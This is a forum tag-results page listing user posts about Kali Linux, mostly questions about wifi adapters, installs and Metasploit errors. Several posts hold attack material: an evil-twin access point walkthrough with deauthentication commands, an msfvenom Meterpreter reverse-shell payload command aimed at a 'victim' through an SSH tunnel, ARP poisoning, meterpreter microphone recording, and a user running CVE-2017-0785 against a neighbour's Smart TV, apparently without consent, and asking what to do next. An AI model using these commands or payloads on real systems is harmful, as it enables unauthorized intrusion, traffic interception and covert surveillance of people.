Jump to content

Search the Community

Showing results for tags 'kali'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. Is it possible to directly connect the MK7AC adapter to a computer running Kali Linux and utilize it for monitor mode and packet injection purposes? I connected MK7AC to the PC, ran the 'iwconfig' command, but nothing is showing up on the Kali machine.
  2. Hi, I am having a very unusual problem with my Kali Linux install on my laptop. Everything works fine except for the audio recently, it has started to make loud crackling noises and such... Like the mic and speakers are too high or interfering with each other. But the problem persists even when I mute everything. This is a recent problem that started within the last week and I have no idea how to fix and I am reluctant to do another install because I tried a kali linux live USB and seemed to have the same problem. I narrowed this down to kali linux because I tried a live USB if Linux nate and appeared to have no issues at the time. Hope someone can help
  3. Hi All, I know this has probably been mentioned on the internet countless times, but I can't seem to get my AWUS036NEH adapter working with Kali Rolling. I've been at this for days and just can't get my head around it. I'm running Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 GNU/Linux. I've trawled through forums here and other places and tried various set ups to get this working with no luck, so hopefully someone here can help me out. Issue: Getting AWUS036NEH adapter to work with Kali Rolling. I can get the device on the system, but I am unable to scan APS (airodump wlan0mon). Although, after trying numerous times to get the adapter working, and keep a log of each step, airodump did work randomly once. (The steps I did will be displayed below) Setup: Kali is running on Virtualbox VM 5.1.24 Tested the following: Plugged in adapter, selected the USB device to be recognized by Virtual BOX and ran lsusb and can see the device. Please see below for what I did and got it working, but does not work anymore when I try again. This tells me, that the adapter intermittently works, but am I not understanding or missing something to get it working consistently? I have each time ran airmon-ng check kill, on each attempt to get it working. (I've set up the adapter on my MAC OS and it works perfectly fine) But as mentioned, I can't get it to work anymore, can anyone put me in the right direction or help me out? Thanks
  4. Recently I got a new Alienware M17 which I have really enjoyed.😊 Currently I just have Windows 10 Home but I want to do a dual boot with Kali Linux. I have been having trouble setting this up lately. I will say what I did step by step and see if anyone knows what to do. First I created a disk partition I intend on using for kali than I I downloaded a Kali Linux iso file from their downloads page. After the kali iso had finished downloading I went and downloaded the Universal USB Installer. I plugged in my USB and began burning the kali iso to the USB. After I was finished with that I booted my computer from the USB and was greeted with the installation page for Kali Linux. I chose the graphic installer option and chose my language and region. Then when it got to the part when it was trying to mount the USB it said it was unable to do so. I had to abort the installation afterwards. I was thinking it may be a problem with my USB as I had already burned another iso (parrotsec OS) onto it and tried to burn the kali onto the USB regardless. Anyways I want to see if any of you have any advice for what I should do in order to successfully dual boot my laptop.
  5. Im looking for some ideas on how to work on and practice using kali linux for the purpose of pen-testing and using all the various functions kali comes with. Things to bare in mind: I am fairly new to this, I have more then one computer, Im looking to aggressively expand my knowledge in this area, and of course i wanna be able to do this w/o breaking or damaging anything. Thoughts and suggestions, please and thank you!
  6. Kali linux has released a free downloadable pdf and a paperback book for around $20. I was wondering if anyone has used this and if it would be worth while.
  7. Has anyone gotten a Samsung Chromebook 3, with crouton installing Kali or Ubuntu, to recognize an external wifi adapter? I keep doing searches and come up with posts from 2014 and 2015 saying that the Chromebook is not capable of recognizing external wifi adapters. Specifically I have an Alfa AWUS036NHA i'd like to use. If i can't resolve this by Nov 1 (2018) i'm just going to buy a "traditional" Win10 PC with a non-eMMC spinning 500GB drive. I've had no problem making those dual-boot. There is so much negative information about (1) making machines with eMMC (SSHD) dual boot or booting up off USB, and (2) Chromebooks not recognizing external wifi adapters. Maybe i need to wait 2-3 yrs for Chromebooks to become more versatile? ... Thanks for comments.
  8. Hi everyone, Long time lurker (asides from software programmer, web programmer and whenever I've some time, avid reader). I just re-installed after a long time Kali into my XPS15, and now I get a black screen after login, no matter what X I choose, Gnome, Classic or X11 Default. Any ideas on what may be happening or how to fix it (I know it most probably is the drivers, but how to verify it?) Thanks a lot
  9. Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with „msfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance
  10. Recently installed Kali to my RPi3, and also to a USB drive for use on my Ubuntu16/Win10 laptop. Today I tried to make the Kali USB drive 'persistent,' and I thought maybe some people even more newbie than me might be interested in hearing what i had to do to make it work. Following the instructions blindly doesn't always work: (1) Creating the USB drive, no problem: https://docs.kali.org/downloading/kali-linux-live-usb-install However i had to do it using Win32 Disk Imager, because when i used the 'dd' method (from Ubuntu16 in a VirtualBox) it ran all night and still hadn't finished. So, Win32 imager. (2) Then on to make the Kali installation have 'persistence' so it would save settings and be able to save downloaded applications and scripts: https://docs.kali.org/downloading/kali-linux-live-usb-persistence ... which is where i began to have some problems. Under Step 1. i wasn't getting the prescribed sdb1 and sdb2. I had 3 sdb drives already. So i went back and repeated the Win32 Disk Imager process, and then doing fdisk -l on the usb drive, in a Ubuntu16 machine, showed me sdb1 and sdb2. ... Step 2. went well, in my case it was kali-linux-2018.1-i386.iso and i executed each line in Step 2 separately, waiting for each process to finish. ... Step 3. again execute each line separately and wait for each one to finish before going on to the next. ... Step 4. is where i was baffled; i wasn't getting persistence on re-boot. It turns out the directory wasn't being created, nor was the persistence.conf file. I had to go to /mnt, create the directory, cd to it, create persistence.conf and enter the ' / union ' and save it. Then unmount. I think that is all i had to do. Create a dummy text file in my home directory, save it, re-boot into Kali Persistent mode, and voila i had persistence. ... To experienced users, this all must seem silly, but six months ago i would have been totally baffled by the instructions "not working." Even newer newbies may find this hair-pulling today useful. ... THEN: (3) Why wouldn't my command-line rtl-sdr WBFM script work? rtl_fm -f 93.3e6 -M wbfm -s 200000 -r 48k - | aplay -r 48000 -f S16_LE First, of course, sudo apt-get rtl-sdr. But my one-liner wouldn't put out because my Kali didn't have aplay. So: sudo apt-get install alsa-utils, then the script would run. Almost. This version of aplay didn't like ' -r 48k ' so i had to change that to ' -r 48000 '. Then i got my FM station. Audio quality poor, so i will have to tweak that script on Kali. On Ubuntu16 i think it sounded just fine. So that was my day today. NEXT: installing rfcat on my Pentoo USB stick. I haven't a clue, yet. I did figure out that 'sudo apt-get install' gets replaced by 'sudo emerge --ask' but it doesn't find rfcat anywhere out there. I'm probably doing something wrong? ... Cheers.
  11. i am setting up a computer dedicated as a learning resource and tool. People get caught out by stating without security from the beginning. There are also setting in tor that secure you even further but im not sure on what that is, i remember hearing about it in a defcon video. But basically this post is just asking how i can keep myself safe on the dark web and learning and using these resources to work my way into becoming an intelligence worker for my county. All help is greatly appreciated. Thank you
  12. I'm looking for the best dual band usb device for kali. I want to do packet injection. I found a list of usb wifi kali devices here , here is the list: * Alfa AWUS036ACH * Tp-link T4UHP AC1300 Do you know more devices? are those the best ones? I don't want to pay more than 60usd-70usd
  13. So i was connected to the internet via eth0 and was trying to use ettercap and arp poisoning and then my router stopped giving internet if have tried to perform <echo 1 /proc/sys/net/ipv4/ip_forward> and also i have tried restarting my router multiple times and unfortunately there was no luck so how can i fix this problem
  14. I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name) Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" Deauthorizing clients on another terminal aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Configuring nano /etc/dhcp/dhcpd.conf authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200; } Installing bridging utilities apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Bridging interface root@kali:~# brctl addbr evil \\Name of the bridge i made root@kali:~# brctl addif evil eth0 \\my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~# ifconfig at0 0.0.0.0 up root@kali:~# ifconfig evil up Starting DHCP server root@kali:~# systemctl start smbd.service root@kali:~# dhclient evil root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0 Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server. /etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service. IP gateway root@kali:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
  15. I am really really brand new in Linux. I recently set up a lab for pen testing, but stuck by a few networking issues. Host window10, guest Kali linux, eth0 and eth1(both are in same subnet, also same as host-only adapter ), use both host-only and bridged modes. there are several questions for help: 1. firstly I enabled host-only network mode in virtualbox for Kali. By using eth0, I can ping host-only adapter on host successfully, but cannot ping host ethernet adapter. I think that is how host-only mode works. then I enabled Bridged mode, I thought there should be a new ethernet interface showing up on host, however, it didn't(until now only two interfaces on adapter settings, one is host ethernet interface, the other is host-only) . my question is whether it is normal... 2. continued the above scenario...I assumed that is normal...then in bridge mode of virtualbox setting, I selected host ethernet adapter name from dropdown list as the one for bridge. Also configure eth0, eht1, host-only adapter and host ethernet adapter into the same subnet. When I bring eth1 down and bring eth0 up, from host terminal, I cannot ping ip for eth0, but from Kali terminal I can ping host machine and 8.8.8.8, cannot ping host-only adapter, cannot open up google.com in browser(it really confused me...); if I bring eth0 down and bring eth1 down, can only ping host-only adapter. so it appears that eth0 only works for Bridge and eth1 only works for host-only, is that right ? 3. I noticed some posts mentioning that there should be a bridged connection between host-only adapter and one local area connection(also an adapter, in my scenario, host ethernet adapter is supposed to take this role), but I don't think it is true. can you guys advise ? 4, sorry, my question or description of the question are a little mess...words in bold are questions. before entering the real pen testing, I already got so much confusion, thanks a loooooot !
  16. I am really really brand new in Linux. I recently set up a lab for pen testing, but stuck by a few networking issues. Host window10, guest Kali linux, eth0 and eth1(both are in same subnet, also same as host-only adapter ), use both host-only and bridged modes. there are several questions for help: 1. firstly I enabled host-only network mode in virtualbox for Kali. By using eth0, I can ping host-only adapter on host successfully, but cannot ping host ethernet adapter. I think that is how host-only mode works. then I enabled Bridged mode, I thought there should be a new ethernet interface showing up on host, however, it didn't(until now only two interfaces on adapter settings, one is host ethernet interface, the other is host-only) . my question is whether it is normal... 2. continued the above scenario...I assumed that is normal...then in bridge mode of virtualbox setting, I selected host ethernet adapter name from dropdown list as the one for bridge. Also configure eth0, eht1, host-only adapter and host ethernet adapter into the same subnet. When I bring eth1 down and bring eth0 up, from host terminal, I cannot ping ip for eth0, but from Kali terminal I can ping host machine and 8.8.8.8, cannot ping host-only adapter, cannot open up google.com in browser(it really confused me...); if I bring eth0 down and bring eth1 down, can only ping host-only adapter. so it appears that eth0 only works for Bridge and eth1 only works for host-only, is that right ? 3. I noticed some posts mentioning that there should be a bridged connection between host-only adapter and one local area connection(also an adapter, in my scenario, host ethernet adapter is supposed to take this role), but I don't think it is true. can you guys advise ? 4, sorry, my question or description of the question are a little mess...words in bold are questions. before entering the real pen testing, I already got so much confusion, thanks a loooooot !
  17. ok so im stumped, have installed the ralink-fw for the 5370 yet my kali machine will still not detect this adaptor, the hak5 site states this adaptor works with kali yet for me its not, i have other adaptors but i like how small this is thanks in advance
  18. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?
  19. To keep things short I've been experimenting with cracking wpa in aircrack. Everything works fine except a handshake is never captured as I am told when I go to run aircrack against the .cap file. I am using the panda PAU09 which plenty of people say works great, and yes the deauth command does work. I'm testing this in a home lab type set up so I know for sure the device reconnects to the AP, but for some reason I cannot capture the handshake. I am using the latest version of kali linux on the rpi, but have also tried on parrot sec os with the same issue I an following this guide ( https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ ) to the point, substituting my ap's mac. When I use airodump APs show up but connected clients do not. Please help
  20. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you
  21. Good day experts,. I am testing a WiFi Adapter that i bought from the HakShop on Kali VMware for my pentesting class. I have noticed the adapter works fine with Windows 10 as i am able to view wireless networks and connect to them. In my Kali VM i am able to add the USB adapter fine unfortunately, it does not discover any available networks. Any suggestions that can cause this. Thanks
  22. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
